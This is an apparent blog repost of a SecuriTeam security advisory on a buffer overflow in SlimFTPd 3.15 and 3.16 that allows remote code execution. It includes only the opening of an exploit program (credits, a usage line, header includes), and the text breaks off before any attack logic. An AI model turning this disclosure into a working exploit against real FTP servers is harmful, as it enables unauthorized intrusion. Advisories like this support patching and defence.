The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
SlimFTPd Buffer Overflow (LIST)
------------------------------------------------------------------------
SUMMARY
<http://www.whitsoftdev.com/slimftpd/> SlimFTPd is a fully
standards-compliant FTP server implementation with an advanced virtual
file system.
Due to lack of proper length checking routines in SlimFTPd, attackers are
able to to execute arbitrary code by overflowing a buffer the program
uses. The following exploit code can be used to test your system for the
mentioned vulnerabilities.
DETAILS
Vulnerable Systems:
* SlimFtpd 3.15
* SlimFtpd 3.16
Exploit:
/*
*
* Written by redsand
* <redsand@redsand.net>
*
* Jul 22, 2005
* Vulnerable: SlimFtpd v3.15 and v3.16
* original vuln found by: Raphael Rigo
*
* Usage: ./redslim 127.0.0.1 [# OS RET ]
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef WIN
#include <winsock2.h>
#include <windows.h>
// #pragma lib <ws2_32.lib> // win32-lcc specific
#pragma comment(lib, "ws2_32.lib") // ms vc++
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
No comments:
Post a Comment